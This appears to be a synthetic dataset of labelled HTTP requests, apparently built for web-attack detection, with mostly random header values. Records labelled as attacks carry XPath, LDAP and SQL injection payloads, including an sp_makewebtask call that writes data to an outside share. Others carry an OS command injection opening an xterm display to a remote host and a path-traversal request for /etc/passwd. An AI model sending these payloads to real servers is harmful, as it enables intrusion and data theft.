Range: -5
Referer: /naoiu/aYrh/ocNtmtr/votaua/eaoin.exe
TE: gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 2.0; ln-is; rv:5.2.8) Gecko/13916647
UA-CPU: 68000
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 9.8 www.eafdhse.jpeg
Transfer-Encoding: deflate
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 669 www.arAn.jpg "e3btqt7scal3asb" "Tue, 04 Nov 08 19:20:43 GMT"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28705
Start - Id: 2606
class: Valid
GET /shutdownGAX7O0aZN/d3uNBgfYkvsEq27F/3sa/aQya.oOe4x.gif?A9Sif0nrlIian=huiCZ HTTP/1.1
Host: 63.97.150.161
Connection: tniot
Accept: */*;q=0.8
Accept-Charset: iso-8859-1;q=0.1
Accept-Encoding: 
Accept-Language: t6-dl;q=0.8, eyeit9a-eattSdI;q=0.1
Cache-Control: no-transform
Client-ip: 203.144.144.134
Cookie: CyI7EEdropusrFpaa=pEetanee;WPyN=(Gdq
Cookie2: $Version="6"
Date: Tue, 26 Jul 05 17:40:18 UTC
ETag: W/"Odn1fMbYERnDz3JfNZL"
Expect: stixncs
From: noRet8q@IsA1lAtsho.be
If-Modified-Since: Mon, 17 Apr 06 23:39:37 GMT
If-Unmodified-Since: Sun, 09 Apr 06 23:54:35 GMT
If-Match: *
If-None-Match: "upP9yhXgWgtLs8UGXk"
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 45
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic YXpvaG1uOmRualRveDU=
Authorization: NTLM c2VzOG83aUVvYXJsdGVjZmVsZWZ1ZWx0bXJudHk4OVY0aW5s
Range: 358055-4261
Referer: /iysg0oyr/elflxEoO/ufsp/mesvsOt/dtlt.zip
TE: trailers
Trailer: If-Modified-Since
User-Agent: 7Ahtamlte
UA-CPU: MIPS
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 7.9 www.ehgta5.jpeg:315, FTP/3.1 238.211.53.109
Transfer-Encoding: gzip
Upgrade: hutie/7.1
Warning: 490 www.edeoica.css "irieceeHr1udvocili" "Sat, 01 Apr 06 08:34:39 GMT"
X-Forwarded-For: 111.117.154.17
X-Serial-Number: 9671188655936
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2606
Start - Id: 35522
class: XPathInjection
PUT /09ffhPp.O/acrEteeewhc7ehre/kR-6euqdX-6CwU_/d0oouht/cittio/Zv.shtml? HTTP/1.1
Content-Length: 136
Content-Language: k,i6suye0
Content-Encoding: gzip
Content-Location: http://www.htbemq.st/aWia2/yiwttrlS/lgaza.zip
Content-MD5: dGVwcGxtbmV2ZXJ1Y3JlSA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 20:40:13 GMT
Last-Modified: Tue, 20 Apr 04 01:58:03 CET
Host: www.loj4.be:125
Connection: keep-alive
Accept: image/png;q=0.8, text/*;q=0.6, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: lse-r;q=0.0, l-ofc, nsns-qoE
Cache-Control: min-fresh=40
Client-ip: 239.91.133.174
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="1"
Date: Tue, 05 Jan 10 19:06:52 GMT
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: iSTRreh@vcr3m.net
If-Modified-Since: Tue, 02 Dec 08 07:58:08 CET
If-Unmodified-Since: Sat, 12 May 07 16:49:45 CET
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: *
If-Range: Sat, 04 Feb 06 22:38:31 GMT
Max-Forwards: 042
MIME-Version: 2.0
Pragma: no-cache
Authorization: NTLM b2l0Y2FvQ2l0MnJzdm5lb2VpZWhFZW90dHF0NmFxaWV0eWVOZWQ=
Referer: http://yjaaw6xd.uk/ptagii/uOnieadI/c96t.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 3.8; tE-6e; rv:8.0.8) Gecko/70252172
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
----: ---------------------------------

rashecAtesMk= rne&s1cecpzh=4tc&Rticims1wka=scu/dwe8Oe/n/child::node()[position()=443] or  'arlne' =    '

End - Id: 35522
Start - Id: 34325
class: Valid
POST /isn84mi1/s0sl1enwmCRh45sn1drs.png? HTTP/1.0
Content-Length: 189
Content-Language: pyo,8eh,t5Dg3sce
Content-Encoding: compress
Content-Location: /dh2haac/idlsk6ww.jpg
Content-MD5: amVkcGxoclRiaHBzdGd5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 10 05:15:12 CET
Last-Modified: Sun, 01 Feb 04 13:29:33 CET
Host: 183.107.8.122
Connection: hbael
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: oBeaar-merieex0
Cache-Control: no-transform
Client-ip: 78.63.251.80
Cookie: sok4nef=hBytLKd1iv;ksavnhinrm=Ucot|1e;DS@gMuj=naRzn;amscgbrMOolHen=018
Cookie2: $Version="03"
Date: Tue, 04 Sep 07 19:21:57 CET
ETag: "adYjPYqUsr6tQ5YM"
Expect: 100-continue
From: viamr6@yergvcA.biz
If-Modified-Since: Sat, 21 Oct 06 12:53:49 CET
If-Unmodified-Since: Tue, 06 May 08 21:19:56 CET
If-Match: *
If-None-Match: "5BCwEOWsOvze-JB"
If-Range: Fri, 06 May 05 20:24:24 CET
Max-Forwards: 780
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM dDBvaXV0aWVlYTNjYW5hQW16ZWFiZUdwYW9sZGVic2xtaGI3M2l6ZWF1
Range: 57611-03,96861-67,47-486
Referer: http://li1nrd.ch/aionv3e/trstun/odooi/ewth.tar.gz
TE: trailers,gzip;q=0.8,deflate;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/0.7 (compatible; Konqueror/9.6; WinNT; 3taem6pJIy)
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 1.5 www.2teoe2za.tiff
Transfer-Encoding: deflate
Upgrade: lOrae/2.3, unerfn/4.1, roft/4.9
Warning: 043 www.eepu.css "fuina4" 
X-Forwarded-For: 252.208.59.218
X-Serial-Number: 57690312658
----: -----------------
~~~~~: ~~~~~~~~~~~~~

like@ZZ5iHp@BoB=u3pMwdli4itaadyE&ltaial=1&lrlsfs9r5A=$rruae:il En9&tuintrehd1= qs9a4cEautoexecirng&JfHFJzG=4185046909&aa=q8_hG3f-s@&rSehutocsst=im0TinjMr&tunmm=40&heeyHTzicijet8h=tcmd

End - Id: 34325
Start - Id: 48770
class: XPathInjection
GET /l9SkHMjopn_/cnk/gJ0oLDjaLo.G8Ij/e5VDZWbqBkdeUOYK/hZyDgvrAew7/seoElrnsitthf/52bn3LET.msf?xhtalz=Ebe&zm803tBRFD=lreeeGfewh5&6eeucessa1aoAhe=eil%2Fy6eeNg%2Fulta%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D334%5D+++or++%27rag%27+++%3D++%27 HTTP/1.0
Host: www.ihdu.de:80
Connection: rtevwlNu
Accept: audio/*, audio/x-wav, image/*
Accept-Charset: windows-1252;q=0.8, x-mac-arabic
Accept-Encoding: gzip, identity, identity, gzip;q=0.3, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 232.245.220.245
Cookie: 5un4eLaeerHl=m> ;dsreeemtthnlfai=mGP0YAs
Cookie2: $Version="80"
Date: Thu, 02 Feb 06 07:36:07 CET
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Tue, 01 Feb 05 02:03:34 GMT
If-Unmodified-Since: Sat, 29 Jul 06 16:34:01 CET
If-Match: "N6RXJr0oaNP-Mw06jzRF"
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: Fri, 19 Oct 07 11:38:03 CET
Max-Forwards: 4
MIME-Version: 1.8
Pragma: a7raot='8nrwBMl'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Basic cElhbDplZWljMUVl
Range: -333764,-7
Referer: http://oanos.st/h1to/rnehc/6psaa.swf
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/1.8 (Windows; U; Win98 6.5; T1-3l; rv:0.4.0) Gecko/79212007
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 1.6 www.tatea.html:26111
Transfer-Encoding: gzip
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 526 136.169.175.214 "laeisnhoreecfefnrs" 
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48770
Start - Id: 37757
class: LdapInjection
GET /e02ht-4TEfNH/5iZJwlv@x6JMEl5yaz1D/syUTzUhAQzkW/4aiesNntuienm/eqeX3ohOoLg/drZ_/et4sRH/ir8YMYhXpIHob6fg/aIeyaadpEe0msbRol/StT2/sgtiraihrn.php3?erlw4=w%40zMwWyc3&mmuFgsbl6yio=opla3&h1Eiatn=992908&aHmshutwur89r=s%3E%24i2rcooitpnull&4t2sh=toS4eval%25ook&pd=Ay4i8o&ttNh9et8l=82859&hllttnrn8t=Ra%29%28%26%28objectClass+++%3D++antt*%29&uxmlcOMYbf=mnetcatt1eRlunbe&v3ptjseolt=u_F%40rg9iz%40di&wle=277&cePl0asrshmeta1=144 HTTP/1.1
Host: www.NsNt4schek.com
Connection: ti2o
Accept: audio/x-wav;q=0.7, application/*;q=0.3, application/*;q=0.9
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: *
Accept-Language: oimtwjn-Uhaswec
Cache-Control: no-transform
Client-ip: 28.9.182.133
Cookie: 8Hrngauoie=6l1c8;esunftde=0t;cptaoenzhOmtp=323645759;abetween5gCQZ.p0aT=5
Cookie2: $Version="5"
Date: Tue, 20 Jan 04 07:43:27 CET
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: *
If-Range: "d9PISRG.MZaoAeAaY2wC"
Max-Forwards: 63
MIME-Version: 0.5
Pragma: no-cache
Authorization: Digest response="42DFa0d9d30110Cd4A8d64beE9770f3B"
Range: 6-
Referer: /ydtco5/dnsnt/ha7b/it16osu/t8fx.gz
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 2.3; zi-ar; rv:0.5.3) Gecko/25023682
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 633x6724
Via: FTP/6.0 www.irtA4.js
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 4395839
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37757
Start - Id: 41075
class: SqlInjection
GET /zWhttpsnL1IscriptautoexecQBvKP/s5WAallexecRp/o7e_/nn.h-Q/yhdp/oaeiax8onispocyq0/p0/l1.mspx?a3s9davCoiesaD=pseNPuu&9WMlND=tse+&negeRvwR=%27%3B+EXEC+++master..sp_makewebtask++%22%5C%5C61.99.132.223%5Cfaim%5Cysrrgd41.gif%22%2C++++%22SELECT+++++*+++FROM+INFORMATION_SCHEMA.TABLES%22&ietAdaoeaOeiO=lc9eQs3kAeooleiez&KfSuYo2sZ_Ej=gisst+&MrmdseomefWsvul=891&iudhtZrhdh4xoa=%28frho7ivetl&iAtxcqstoystaeF=d%29&o3toesiydipg=559&pjY4tEP=byrarrI+&lcMa=6&osoyrs=fnu&I-ITSAEh8=rcpje&bZmHenvm7niv=5&d8e=deapLs HTTP/1.1
Host: 225.225.26.247
Connection: close
Accept: audio/x-wav, application/*, image/*
Accept-Charset: ks_c_5601-1987;q=0.8, windows-1250, iso-8859-3
Accept-Encoding: compress, deflate;q=0.1, identity, identity, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 233.27.97.179
Cookie: NG3-=6|insertm0Nb0aasbys(;3MTFYino=7;4rghvnat=nctwu;sittc=: 
Cookie2: $Version="90"
Date: Thu, 08 Sep 05 24:25:32 CET
ETag: "6r-fYwsYHOv4rS21"
Expect: nwthh=yimthei7
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 26 Feb 10 02:11:54 GMT
If-Unmodified-Since: Fri, 18 Nov 05 06:01:20 CET
If-Match: *
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 2
MIME-Version: 9.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic dHRpMHRTOnJzOG5ldGFz
Range: 253-,679517-254
Referer: http://sxpAeeia.it/dLdnr/rr3Tr/iNsnhth/cdmnOu.tar
TE: trailers
Trailer: Max-Forwards
User-Agent: sBSdhbitaeeeeinnhts
UA-CPU: 68000
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: FTP/4.4 www.nethm.htm
Transfer-Encoding: identity
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 11.72.236.31
X-Serial-Number: 54708069609443708
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41075
Start - Id: 1036
class: Valid
GET /nhh@0rltsF/K8Oihscriptperllocation/ufENlp8r7sen1s8/itetQln/tgmr/RRssK6lgo7t.dll?N5e1YHincludeAD=0&ttait=access_log%2Bnnselectd&Se7=dedstdSosr&nrgez=4483426&gTleimmi=ltzot%5Dozs%3Fi3maoptf%7Ca&ac=44&ceaertrNg=uvUD%40xzxCp&hi6teethesroonh=9392&-Wntq7Lm883V=42975&iiwtt0occ=yBz6t_AU-nh&geialygOaaoytne=6l1 HTTP/1.0
Host: 174.179.7.151
Connection: sihnzeza
Accept: image/jpeg;q=0.0, application/postscript;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-age=50
Client-ip: 131.45.136.130
Cookie: ntMvtrn=zt;bse8f0eat=eerssEsehl3ny3Ease;sosu0BTsfrole=87976;2ihgasareie1so=dhoisa;Jssetrcdunad=52764
Cookie2: $Version="135"
Date: Sun, 12 Feb 06 05:31:23 CET
ETag: W/"R-BVZkF_bOIKpJN"
Expect: 7e3se
From: lSpom@es6vknOma.biz
If-Modified-Since: Thu, 20 Jan 05 10:49:27 GMT
If-Unmodified-Since: Thu, 27 May 04 24:38:30 CET
If-Match: "QrjMq2uG5ntDb3olN"
If-None-Match: "rM3SsK23LjQIYafEKDD"
If-Range: Fri, 17 Nov 06 16:50:52 CET
Max-Forwards: 31
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: id7l4l x1fuyra=sVlhNT
Authorization: r3lzac deblas=Scrslhww
Range: 339-65412,180-85,-47
Referer: http://www.6sfmiy.gov/toTdm/osoa/st3Xe/pl0kdT.msf
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 3.8; Rk-au; rv:4.2.3) Gecko/96498948
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5033x777
Via: HTTP/4.6 37.79.131.195
Transfer-Encoding: gzip
Upgrade: Ebr/0.5
Warning: 207 243.164.84.195:635 "nErgr" 
X-Forwarded-For: 101.119.184.116
X-Serial-Number: 3135796940
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1036
Start - Id: 20709
class: Valid
GET /nbeeeeatrs7lh9ntrm.asp? HTTP/1.0
Host: www.ptnaffo.net
Connection: naenl9o
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 203.12.122.191
Cookie: rE=700531;lmeasze3tsgma=adeTethnrreknitaI;.jkt8=687496
Cookie2: $Version="512"
Date: Mon, 16 May 05 04:35:13 UTC
ETag: "7T6Fhzz0UC38LaOaY"
Expect: cgaczg=nthws
From: Eenieeb@jtsh.ch
If-Modified-Since: Sat, 28 Nov 09 05:04:48 UTC
If-Unmodified-Since: Sat, 11 Sep 04 10:28:16 UTC
If-Match: "wIjLty5wg2.8bTrHC-Xx"
If-None-Match: "yhPGv75G3VDfj83D5"
If-Range: Thu, 18 Oct 07 16:20:18 GMT
Max-Forwards: 135
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: Digest cnonce="aeatzele"
Range: 15-,71-,5-
Referer: /n3xa/hfal.mdb
TE: chunked;q=0.5,chunked,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.7 (compatible; Konqueror/9.6; Open BSD i386; axexSt3b)
UA-CPU: MIPS
UA-Disp: 031,1343,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 413x553
Via: eha/2.4 www.soysNfid.jpeg
Transfer-Encoding: gzip
Upgrade: OtSal/2.6, ete/2.1, oHfg/3.7, dMshA/4.9, hnrpor/3.2
Warning: 341 201.56.17.21 "Ure9etynljDeGn9" "Wed, 17 Jun 09 02:59:00 GMT"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20709
Start - Id: 36374
class: PathTransversal
POST /StFc/WOp@perl7Y6BC.js? HTTP/1.0
Content-Length: 172
Content-Language: Mmsitgj,ep,nbdhEc
Content-Encoding: gzip
Content-Location: /tdSdh/wssonjG.gif
Content-MD5: N2R3ZUZPYTNuc25lZW9uYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Jan 06 23:49:26 GMT
Host: www.loohE.st
Connection: une1oEw
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: /etc/passwd
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 77.70.24.105
Cookie: 2yjsN5rde08e=pf tn;dtzr=ute 
Cookie2: $Version="3"
Date: Fri, 01 Jul 05 22:44:34 GMT
ETag: "E7m-S6P3VL1I_pjZA0Jt"
Expect: 100-continue
If-Modified-Since: Thu, 21 Jun 07 13:29:27 CET
If-Unmodified-Since: Wed, 20 Apr 05 23:07:40 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Jun 04 02:24:21 UTC
Max-Forwards: 079
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /qhde2d/esie2/aYiokae/aTvth.gif
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (compatible; ynl86qjEd; Mac OS X; N6on; oaqp; sieoaoais)
UA-CPU: 68000
Via: 8.2 www.LASc.jpg:727
Transfer-Encoding: compress
X-Serial-Number: 40169303930821255

KGBZsy=s&beTui=rfs&noz8ie=9137&pesa2nn=n7yh65xterm2zhsh&rcmiefcrdamil=tfL3FEL9uC90&epYeerhinng0tf=240287&doE= e%miobad&r0nepdnsen4ao=a9&nTtogpwsIHs=57721&ShivriwiohHt= es

End - Id: 36374
Start - Id: 5900
class: Valid
POST /noES5h/ocetde2lewlpeaat39cs/mTL-MBd4qu/rt6nraoa5/epDqjX5gFQg77XfSnAO1/ei.Wa2mSce./js214v@N5w8GfOj/egd3diseegnaeecapno/nEgzCT..UTST.pl? HTTP/1.1
Content-Length: 215
Content-Language: s,crrh,de65egee
Content-Encoding: identity
Content-Location: http://t5hRt.com/forrn80s.msf
Content-MD5: Mm5yaW00U2l6dXJ0cmVzZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Jan 09 07:06:14 CET
Last-Modified: Mon, 29 Nov 04 22:22:10 CET
Host: www.ec1e0.net:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: tosU-stesW;q=0.8, sL-sewrs, vae-bs, rppofeet-iene4;q=0.8, Yzylsats-tiof
Cache-Control: no-cache
Client-ip: 90.129.98.124
Cookie: i2td9=tahnohgSh;aso=yAnhon;ihuOardtharc45=63701843;wthaelgi=sw@IbVBq;SMgClS=ee4
Cookie2: $Version="895"
Date: Tue, 24 Nov 09 11:35:46 GMT
ETag: "4Bcs446OwvwT@LN@"
Expect: 100-continue
From: icsdyt@e0bCi193Ie.st
If-Modified-Since: Sat, 09 Oct 04 24:58:53 CET
If-Unmodified-Since: Mon, 22 Mar 04 17:51:19 CET
If-Match: "kAnKcw6aZZq_VPglQ"
If-None-Match: *
If-Range: Tue, 14 Jul 09 24:54:33 UTC
Max-Forwards: 35
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM SHRmNm55cG1lZXJkZ0lnbnRzcm9KdGZvYTd5aHRjdHRpaUU=
Authorization: 3mpto gteSaebs=S7uI
Range: 349-717
Referer: /wuevrs.mdb
TE: trailers,trailers
Trailer: Upgrade
User-Agent: fVnn (aH7wVvf; nmu6ntP; f8BK60I6xi; hqX@5JLkGI; nKduk7Et8)
UA-CPU: MIPS
UA-Disp: 348,618,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 272x562
Via: 0.8 www.hsussn.jpeg, 0.8 96.217.130.120, 3.8 www.sfzr.jpg
Transfer-Encoding: identity
Upgrade: drs/9.0, 7es/2.7, Dehele/2.8, hzewxo/8.7
Warning: 955 238.15.182.168 "situlaoyhzbwnae" 
X-Forwarded-For: 135.149.224.233
X-Serial-Number: 673720584538972
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8wz=0falAudenmion&tsmdlMeo=(hlxmleu/ eus&ldta9=55sgbueeinem45&asintNm=8143&sWcoruta=eN44mkck8mII&RQEVA9Y=shutdownvar>S8&a4tcsynrneehey=200990&eye=l9mrpi6L5&OGnleYhioz=omwt0e&WyNcUUhz=ts7ud&sjm=aatiuYsacFy$t0

End - Id: 5900
Start - Id: 36808
class: OsCommanding
GET /tz/g8bNRN/ip0EOrylmu5G3i/8kyeh651w/gQ8S0lbKVDRp6/is.imlsOJV-l_tXAzZ/Y1P8SPp0/ssllItqdnauRsnco6d/ak.exe?fhihoemmdsmu=f%2F%7CK%3Ao6&exenmr9=++&Hi3t5=73&qusrsAZHopt=3903&9Cdocument1IZnph-FjAu=iWeek%40f&4e.Lne55CPmailz=%250A++xterm+++-display+++www.nitasealnt.com%3A0.0+&iaNnoehtrNe=aNYjRUqXHeej&Xret5Ofounlsc=is+rrvee+r0cunion&69oE4=b%3A%3Betn&ecryg1Odsdwe=5pNKuY.BuZJ HTTP/1.0
Host: 59.207.82.206
Connection: keep-alive
Accept: image/*;q=0.4, image/*;q=0.0, image/*
Accept-Charset: *
Accept-Encoding: compress, deflate, compress;q=0.9, compress;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie: lapoa=03711;tn26nete5r=niswon>Astn(y)l'ewphps;a.R_havingphpvXpmail=Dhh2usangSmochaM2q;eOdm38zitNheb3T=72
Cookie2: $Version="1"
Date: Fri, 07 Jul 06 05:29:42 UTC
ETag: W/"f.AsugJAgysLA_ZZECY"
Expect: 100-continue
If-Modified-Since: Tue, 13 Jul 04 03:37:44 CET
If-Unmodified-Since: Tue, 15 Nov 05 17:52:24 UTC
If-None-Match: *
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 760
Pragma: no-cache
Authorization: Basic SGluaDpzaWN0bw==
Referer: http://5i8oeit.gov/eietbr.mp3
TE: gzip;q=0.8,trailers
User-Agent: ne4gr0v/9.9.1.6.2
UA-CPU: Sparc
UA-Color: color8
Via: 2.6 250.177.193.196, hey/5.7 75.118.149.67, HTTP/1.2 www.mneoTepl.jpg
Transfer-Encoding: identity
----: ---------------

null

End - Id: 36808
Start - Id: 1370
class: Valid
GET /ewqiVaKDfMMKFzs/vbscripts6vposition5Q0bDbconnectp/hcedianOboeipw/ovPQOT3ubyltR/iuA/zLuvx1y/taceksrrrimtireeuu/s7BAy2kyf.5Ni8EQoIGF/sfeaca91m.asp? HTTP/1.0
Host: www.edh8qg.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-2
Accept-Encoding: gzip;q=0.6, deflate, deflate;q=0.8
Accept-Language: nh1em1s-aivtq, Gtcoe2y-2a;q=0.1, trCk-dihhpnep;q=0.9
Cache-Control: max-stale
Client-ip: 85.112.24.2
Cookie: kyC9FautoexecY=566724611
Cookie2: $Version="7"
Date: Mon, 19 Feb 07 24:39:14 GMT
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: 100-continue
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Sat, 20 Mar 04 23:31:02 UTC
If-Unmodified-Since: Wed, 22 Mar 06 04:16:24 UTC
If-Match: *
If-None-Match: "vwtc9p6PnrCBigSGLc"
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 5351
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWhnckVyenJ0ZWlvc2loRm82dHF0d0thaGRvVmxwYTFvZjJ4ZWxvZHVOaWc2aA==
Authorization: Digest cnonce="ihocn"
Range: 24-
Referer: http://www.Iia6s2eh.gov/2miraeH.asmx
TE: gzip,trailers,chunked
Trailer: Date
User-Agent: myora/4.2.8.2.4
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/7.8 www.dhfylW.js, FTP/3.2 www.kd9m.shtml, 0.8 27.240.228.50
Transfer-Encoding: compress
Upgrade: Iifh/3.1, atthe/8.5
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1370
Start - Id: 21597
class: Valid
GET /rZYMfuD0DbS1uv@z./eY3pfn9n/7g/9unObbonLCFw.JD/eus/sEBFdReYQErN/d7/5K/rd/a4Tn8@qWKKZwiXm.cfm?h38F=1898&eOHttnamdshxee=1lvFf0u8NyDV&nxkn0ia=dH&.G1bsxnetcat9=%7Cgr%7Cf&svmn6me=9897116 HTTP/1.1
Host: www.klEajeI7.ch
Connection: keep-alive
Accept: video/quicktime, application/rtf;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=33080
Client-ip: 152.191.209.222
Cookie: ai=hkn ;rwh=vdhborl6plar4er;cgpiLEi4Iceoue=Nlh8pra rF;aqfk9o=nEnlWaenE;Aefpxi=674681886;wu1o=Ie
Cookie2: $Version="1"
Date: Tue, 30 May 06 01:26:32 GMT
ETag: "HbDOE4mELUlA4X1_S"
Expect: EfeOt
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Wed, 22 Dec 04 22:56:48 CET
If-Unmodified-Since: Thu, 03 Jan 08 14:13:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Aug 05 05:20:02 GMT
Max-Forwards: 927
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rn9Atc aium=isesisee
Authorization: Digest uri=http://www.Frrtshp.gov/xLEdAor/jxex7h8.txt
Range: 2-,639-89,039-12407
Referer: http://7pepiie.fr/lvqho7s/xrnz/rxin/asonaz2.png
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.0 (compatible; Konqueror/4.3; Linux i586; h3zrUte; 8nhTaas0Yw; Oek3hlpsb)
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1645x752
Via: 1.7 www.ctkeesRa.gif, FTP/6.6 16.231.177.7, FTP/8.1 www.azdiaD1h.gif:21
Transfer-Encoding: identity
Upgrade: aead5/2.4
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 12.32.11.193
X-Serial-Number: 0418048557333038
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21597
Start - Id: 14952
class: Valid
